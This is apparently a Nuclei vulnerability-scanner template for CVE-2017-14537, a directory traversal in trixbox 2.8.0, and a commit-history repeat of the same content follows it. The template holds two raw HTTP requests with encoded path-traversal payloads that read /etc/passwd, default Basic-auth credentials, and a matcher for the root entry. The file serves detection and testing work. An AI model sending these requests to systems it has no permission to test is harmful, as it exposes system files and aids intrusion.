nuclei-templates/cves/CVE-2017-14537.yaml

id: cve-2017-14537

info:
  name: trixbox 2.8.0 - directory-traversal
  author: pikpikcu
  severity: medium

# Refrence:-https://nvd.nist.gov/vuln/detail/CVE-2017-14537
# https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
# Product vendor:-https://sourceforge.net/projects/asteriskathome/

requests:
  - raw:
      - |
        POST /maint/index.php?packages HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Content-Type: application/x-www-form-urlencoded
        Referer: {{Hostname}}/maint/index.php?packages
        Content-Length: 160
        Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
        Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
        Connection: keep-alive

        xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages

      - |
        GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Referer: {{Hostname}}/maint/index.php?packages
        Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
        Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
        Connection: keep-alive
        Upgrade-Insecure-Requests: 1

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body
Normalized id fields to match schema regex 2020-09-15 19:25:55 +00:00			`id: cve-2017-14537`
Create CVE-2017-14537.yaml 2020-09-04 04:26:20 +00:00
			`info:`
			`name: trixbox 2.8.0 - directory-traversal`
			`author: pikpikcu`
			`severity: medium`

			`# Refrence:-https://nvd.nist.gov/vuln/detail/CVE-2017-14537`
Update CVE-2017-14537.yaml 2020-09-04 11:39:45 +00:00			`# https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/`
Create CVE-2017-14537.yaml 2020-09-04 04:26:20 +00:00			`# Product vendor:-https://sourceforge.net/projects/asteriskathome/`

			`requests:`
			`- raw:`
			`- \|`
			`POST /maint/index.php?packages HTTP/1.1`
			`Host: {{Hostname}}`
			`User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8`
			`Accept-Language: en-US,en;q=0.5`
			`Content-Type: application/x-www-form-urlencoded`
			`Referer: {{Hostname}}/maint/index.php?packages`
			`Content-Length: 160`
			`Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2`
			`Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=`
			`Connection: keep-alive`

			`xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages`

			`- \|`
			`GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1`
			`Host: {{Hostname}}`
			`User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8`
			`Accept-Language: en-US,en;q=0.5`
			`Referer: {{Hostname}}/maint/index.php?packages`
			`Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2`
			`Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=`
			`Connection: keep-alive`
			`Upgrade-Insecure-Requests: 1`

			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`
			`- type: regex`
			`regex:`
			`- "root:[x*]:0:0:"`
			`part: body`